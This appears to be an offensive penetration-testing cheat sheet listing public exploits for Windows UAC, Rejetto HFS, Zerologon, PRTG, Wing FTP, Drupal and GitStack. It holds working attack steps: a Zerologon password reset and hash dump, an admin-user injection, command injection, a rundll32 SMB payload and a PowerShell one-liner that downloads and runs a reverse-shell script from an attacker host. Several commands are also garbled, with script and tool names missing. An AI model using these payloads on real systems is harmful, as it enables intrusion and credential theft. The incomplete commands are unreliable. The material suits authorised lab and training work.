Public Exploits

CVE-2019-1388: Windows Privilege Escalation Through UAC

Rejetto HTTP File Server RCE [HFS 2.3]


  • Host /usr/share/windows-resources/binaries/nc.exe on attacker's web-server and set-up listener.

  • Modify with Attacker's IP and Reverse shell Listening Port

  • Run exploit : python <target-IP> <target-port>

Zero Logon [CVE-2020-1472]

Write-up :


#Check for vulnerability

#Exploit: Reset Password of DC$ Machine Account to Blank NTLM Hash
python3 <HYDRA-DC> <DC-IP>

#Dump hashes [31d6c.. is a blank hash] -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<Domain>/<DC-Name$>@<IP>'

In case of error, run the following code:

python3 -m pip install virtualenv
python3 -m virtualenv impkt
source impkt/bin/activate
pip install git

PRTG Network Monitor [<18.2.39]

Automated Exploit


Adds a user to Administrators Group : pentest::P3nT3st

  • Login to the app, grab your cookie and add it to the script../ -u <Target> -c "<Cookie-value>"

Modify for Reverse Shell

  • Let's use metasploit smb_delivery to share the payload via Port 445.

  • In, search for pentest to identify payload.

  • Replace payload code.[ URL Encode payload]

    • rundll32.exe \\pbMaor\memorycache.dll,0

    • Encoded:rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A

Manual Exploit

  • Testing for code execution

    • Setup -> Account Settings -> Notifications

    • Parameter: Test; ping -n 1 <IP>

    • On Kali Machine: sudo tcpdump -i tun0 ip proto \\icmp -vv

  • Use Powershell one-liners for gaining a foothold.

Wing FTP Authenticated RCE

  • Testing for code execution :s

    • sudo tcpdump -i tun0 ip proto \\icmp -vv

    • os.execute('cmd.exe /c ping -n 1 <IP>')

  • Try with Metasploit :

    • use multi/script/web_delivery

    • set target 3


  • RCE Affected versions: <

  • CVE-2019-6714

Exploit Write-up :


GitStack RCE

  • Identify Repository: GET /rest/repository/

  • Identify Users: GET /rest/user/

  • Code Execution on password parameter: Use Burp to intercept Basic Auth request:

#Payload:- <User-name>:C && cmd /c powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1')"

GET /web/index.php?p=<Repository name>.git&a=summary HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Basic <Base64-Encoded Payload>
Connection: close

Last updated